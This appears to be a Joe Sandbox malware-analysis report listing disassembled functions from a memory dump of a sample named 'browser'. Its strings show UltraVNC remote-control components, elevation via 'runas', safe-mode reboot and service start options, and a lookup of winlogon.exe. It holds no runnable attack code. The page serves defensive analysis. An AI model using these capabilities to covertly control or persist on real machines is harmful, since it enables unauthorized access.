Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CriticalSection$CloseDeleteEnterFileHandleLeave
String ID: !UVNCDIR-$f
API String ID: 753559762-4271271459
Opcode ID: ec94c065237d398f8d62b421f4d082ca1b1a587006caf467a8040e51e14df5ee
Instruction ID: a0ef437d14a570a06c1dea8193ede5f85b273b3cc6cc7457e2bd4b89b399845e
Opcode Fuzzy Hash: ec94c065237d398f8d62b421f4d082ca1b1a587006caf467a8040e51e14df5ee
Instruction Fuzzy Hash: 07419A21628A8181EB60AF34D4543B9A7A1EF85B64F441335DA6D4B7D5DF3CF444C721

Function 00007FF790C3ACB0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF790CE92A4: malloc.LIBCMT ref: 00007FF790CE92C7

inet_addr.WS2_32 ref: 00007FF790C3AD73
free.LIBCMT ref: 00007FF790C3AD92

Strings

both, xrefs: 00007FF790C3ACF7
0123456789., xrefs: 00007FF790C3AD45
local, xrefs: 00007FF790C3AD2B
remote, xrefs: 00007FF790C3AD11

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: freeinet_addrmalloc
String ID: 0123456789.$both$local$remote
API String ID: 2387382576-3366603569
Opcode ID: c0e91ff71c9c1b6fadc6fcdf247a3b57fa66267f63b9c525a4ac725aaf56df2e
Instruction ID: 97c3ba4976bb42aaa7e934b4553bc789dba396fdb2c1c7c6089f96b9629859f0
Opcode Fuzzy Hash: c0e91ff71c9c1b6fadc6fcdf247a3b57fa66267f63b9c525a4ac725aaf56df2e
Instruction Fuzzy Hash: 2421D621A2C68141F774BB31A9003F8A7A1EF897D0FD89131DA1D0B7D5EE2DF9918320

Function 00007FF790CED58C Relevance: 10.6, APIs: 7, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 00007FF790CED5AF
_errno.LIBCMT ref: 00007FF790CED5B7

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: 32eb1db604c35a1bd73017e45f5c353669c4e319d3a98b1b574dd58bb646ad4a
Instruction ID: 79a31dd545b56cd5a98a827dcf25a0fcc6e29a0c73c8d35f1cdd21edc7e91c98
Opcode Fuzzy Hash: 32eb1db604c35a1bd73017e45f5c353669c4e319d3a98b1b574dd58bb646ad4a
Instruction Fuzzy Hash: 88219D22A3860245F6357A7598512BDA5556F827A1F894535EA1C073D2CE7CFC42EB30

Function 00007FF790C47220 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF790C47249
fclose.LIBCMT ref: 00007FF790C472CE
ShellExecuteExA.SHELL32 ref: 00007FF790C4732B

Strings

\uvnckeyboardhelper.exe, xrefs: 00007FF790C47290
p, xrefs: 00007FF790C47322
runas, xrefs: 00007FF790C472E5

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: ExecuteFileModuleNameShellfclose
String ID: \uvnckeyboardhelper.exe$p$runas
API String ID: 3322125093-2954907143
Opcode ID: 037d2c38e5ac395d24b8413dad22403111c8ed725fed3ca7cb3e142dbe59519c
Instruction ID: 088c9c4962c17cfe167c8d6313a1a6333c9259d9a896817d592559973fc2d18f
Opcode Fuzzy Hash: 037d2c38e5ac395d24b8413dad22403111c8ed725fed3ca7cb3e142dbe59519c
Instruction Fuzzy Hash: 63310932A18B8285EB74EB30F4513AAB3A5FB89750F805236DA9D43B95DF3CE114CB10

Function 00007FF790CEEEF8 Relevance: 10.6, APIs: 7, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 00007FF790CEEF11
_errno.LIBCMT ref: 00007FF790CEEF19
_close_nolock.LIBCMT ref: 00007FF790CEEF70

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: __doserrno_close_nolock_errno
String ID:
API String ID: 186997739-0
Opcode ID: 0c6e4c21da35182ad9278105eade7e0fa1460cea4b5bf11609be99456b1b247b
Instruction ID: 27bf5ab91a2d5a9003def9e44dcc5cdda15a6be09fef9ad6332b744b8e67fde8
Opcode Fuzzy Hash: 0c6e4c21da35182ad9278105eade7e0fa1460cea4b5bf11609be99456b1b247b
Instruction Fuzzy Hash: 2011AC22E2824285F2253BB5A8412BDA650AF827A1F995634E51D073D2CE6CFC419734

Function 00007FF790C33E60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 56timewindowCOMMON

Download Yara Rule

APIs

SetBkMode.GDI32 ref: 00007FF790C33E9C
SetWindowPos.USER32 ref: 00007FF790C33ED5
KillTimer.USER32 ref: 00007FF790C33EF3
PostQuitMessage.USER32 ref: 00007FF790C33EFB
SetTimer.USER32 ref: 00007FF790C33F14

Strings

d, xrefs: 00007FF790C33EB3

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Timer$KillMessageModePostQuitWindow
String ID: d
API String ID: 3664928928-2564639436
Opcode ID: 118553bd85ce4610845fc2bc57698abad58593aa61c72bc6e801eda45dbd9551
Instruction ID: 021eeb168e2ed772aa273afc4da6ed22b18abbfd520b7088ccdddffed3f4c3fe
Opcode Fuzzy Hash: 118553bd85ce4610845fc2bc57698abad58593aa61c72bc6e801eda45dbd9551
Instruction Fuzzy Hash: 9E1151A2E3860383F7706B35A8156B5A2F0AF45365FC45230C91E867E0DE3CF995DA25

Function 00007FF790C4A6F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

GetWindowLongPtrA.USER32 ref: 00007FF790C4A71A
SetWindowLongPtrA.USER32 ref: 00007FF790C4A752
SetDlgItemTextA.USER32 ref: 00007FF790C4A767
SetForegroundWindow.USER32 ref: 00007FF790C4A770
EndDialog.USER32 ref: 00007FF790C4A785

Strings

Oct 1 2014 21:43:49, xrefs: 00007FF790C4A758

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Window$Long$DialogForegroundItemText
String ID: Oct 1 2014 21:43:49
API String ID: 2747855613-2751236551
Opcode ID: 9a61f633431cb37e218c1f842c908c6751c059a7ba695ef3b628182b3906ce08
Instruction ID: f43ea6175e014f2e85223ae08669665dee4c11edca4f07c82a9387753c3da6c7
Opcode Fuzzy Hash: 9a61f633431cb37e218c1f842c908c6751c059a7ba695ef3b628182b3906ce08
Instruction Fuzzy Hash: 72114F31A28B4285E234AB36A5841B9F2B2FB85BD0F944135DA8A07B94CE3CE4418750

Function 00007FF790C3A390 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF790C3A3A6

Part of subcall function 00007FF790C3A200: GetProcAddress.KERNEL32 ref: 00007FF790C3A225
Part of subcall function 00007FF790C3A200: FreeLibrary.KERNEL32 ref: 00007FF790C3A265

LoadLibraryA.KERNEL32 ref: 00007FF790C3A3CB
GetProcAddress.KERNEL32 ref: 00007FF790C3A3E3
FreeLibrary.KERNEL32 ref: 00007FF790C3A407

Strings

SHGetSettings, xrefs: 00007FF790C3A3D9
shell32.dll, xrefs: 00007FF790C3A39F, 00007FF790C3A3C0

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: SHGetSettings$shell32.dll
API String ID: 145871493-1819508790
Opcode ID: 77214687e6c2f938150f522afdd75d8ba5a5dca8d0fd701ab14ac9b329bd435a
Instruction ID: 24b3ec51cb95695a02dce2986b41190b81bed139cfdcf741fa061d9c15bb42d0
Opcode Fuzzy Hash: 77214687e6c2f938150f522afdd75d8ba5a5dca8d0fd701ab14ac9b329bd435a
Instruction Fuzzy Hash: 07118C22B3D64282EE64EB75B4841BA93A0EF89B80FC82035DA5E43755DE2DF491C720

Function 00007FF790C81550 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47keyboardCOMMON

Download Yara Rule

APIs

GetAsyncKeyState.USER32 ref: 00007FF790C81561
MapVirtualKeyA.USER32 ref: 00007FF790C815BA
GetAsyncKeyState.USER32 ref: 00007FF790C815D3

Strings

down, xrefs: 00007FF790C8158A
vnckeymap.cpp : setshiftstate %d - (%s->%s), xrefs: 00007FF790C81591
vnckeymap.cpp : new state %d (%s), xrefs: 00007FF790C815D9

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: AsyncState$Virtual
String ID: down$vnckeymap.cpp : new state %d (%s)$vnckeymap.cpp : setshiftstate %d - (%s->%s)
API String ID: 2891131044-1915745809
Opcode ID: af929e24d0095cd63bb2d8a54ee9630447cb1a074a3e2900237919080e080432
Instruction ID: ec050eaf20b71e293dbfad2253a6336b50b7f9dfb691e8f6dff4344f21d5c9a8
Opcode Fuzzy Hash: af929e24d0095cd63bb2d8a54ee9630447cb1a074a3e2900237919080e080432
Instruction Fuzzy Hash: 4B11B222B38A53C2E620AF31B4001AAF765FB85755F882435E98E47755DF3CE515C7A0

Function 00007FF790C419A0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF790C419C6
Process32First.KERNEL32 ref: 00007FF790C419E5
CloseHandle.KERNEL32 ref: 00007FF790C419F2
Process32Next.KERNEL32 ref: 00007FF790C41A20
CloseHandle.KERNEL32 ref: 00007FF790C41A2D

Strings

winlogon.exe, xrefs: 00007FF790C41A00

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
String ID: winlogon.exe
API String ID: 1789362936-961692650
Opcode ID: c88a6ee81a24712a405af00b899bfba8e059bc7f51f311d566bee420794a0777
Instruction ID: 822eb15ab87a32c130a69adc5e6d9da1287bccac3e529079bc068311dacfbb74
Opcode Fuzzy Hash: c88a6ee81a24712a405af00b899bfba8e059bc7f51f311d566bee420794a0777
Instruction Fuzzy Hash: 96113D31628A8685EB34AB35F8143AAB3B5FF89794F845230D99E46394DF3CF505CA10

Function 00007FF790C5C4E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38timeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00007FF790C5C52A
EnterCriticalSection.KERNEL32 ref: 00007FF790C5C551
RevertToSelf.ADVAPI32 ref: 00007FF790C5C56C
LeaveCriticalSection.KERNEL32 ref: 00007FF790C5C57C

Strings

vncclient.cpp : %%%%%%%%%%%%% vncClient::UNDoFTUserImpersonation - Impersonationtoken exists, xrefs: 00007FF790C5C557
vncclient.cpp : %%%%%%%%%%%%% vncClient::UNDoFTUserImpersonation - 1, xrefs: 00007FF790C5C515

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeaveRevertSelfTimetime
String ID: vncclient.cpp : %%%%%%%%%%%%% vncClient::UNDoFTUserImpersonation - 1$vncclient.cpp : %%%%%%%%%%%%% vncClient::UNDoFTUserImpersonation - Impersonationtoken exists
API String ID: 4293870407-1873781047
Opcode ID: be91d13ce7b9590cac12ce48197b4f720c3c90b62c69517ca8b832bb9a46fa5f
Instruction ID: d9b01c55a6ddd52703b17b0119a02e8077bec70733a90656e3ed48251578b52c
Opcode Fuzzy Hash: be91d13ce7b9590cac12ce48197b4f720c3c90b62c69517ca8b832bb9a46fa5f
Instruction Fuzzy Hash: 88119E51A3C58245FB24AB7494883B8A7A1FF45784FD81031D64D06391DF3CF095C760

Function 00007FF790C436C0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF790C436EB
GetForegroundWindow.USER32 ref: 00007FF790C436FC
ShellExecuteExA.SHELL32 ref: 00007FF790C4373F

Strings

p, xrefs: 00007FF790C436F3
-rebootsafemode, xrefs: 00007FF790C43733
runas, xrefs: 00007FF790C43711

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: ExecuteFileForegroundModuleNameShellWindow
String ID: -rebootsafemode$p$runas
API String ID: 3648085421-4291177908
Opcode ID: ebe23701378919e1af33a6bf656780ce82059cac4ad0fb8edc734de712cd212d
Instruction ID: 7f6eee00db50be5f31e925a5763c63d4eb11d0a571cf5de0334e7b87ee5d2f4d
Opcode Fuzzy Hash: ebe23701378919e1af33a6bf656780ce82059cac4ad0fb8edc734de712cd212d
Instruction Fuzzy Hash: 62019532629B8185E6219B30F49439AB3B4FB89744F801135E68D02764DF7CE158CB10

Function 00007FF790C399C0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 27COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF790C399E9
GetForegroundWindow.USER32 ref: 00007FF790C399F8
ShellExecuteExA.SHELL32 ref: 00007FF790C39A47

Strings

-startservice, xrefs: 00007FF790C39A2A
runas, xrefs: 00007FF790C39A03
p, xrefs: 00007FF790C399EF

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: ExecuteFileForegroundModuleNameShellWindow
String ID: -startservice$p$runas
API String ID: 3648085421-278061118
Opcode ID: 926b2c35945988a05c881ee216fe9ef46aea1621d10afb6dfb6c9793bb67f9ef
Instruction ID: c18a4b24684715a18ade81c6568f1e0ed36c0b86bee8bcf3871d111afc316c6f
Opcode Fuzzy Hash: 926b2c35945988a05c881ee216fe9ef46aea1621d10afb6dfb6c9793bb67f9ef
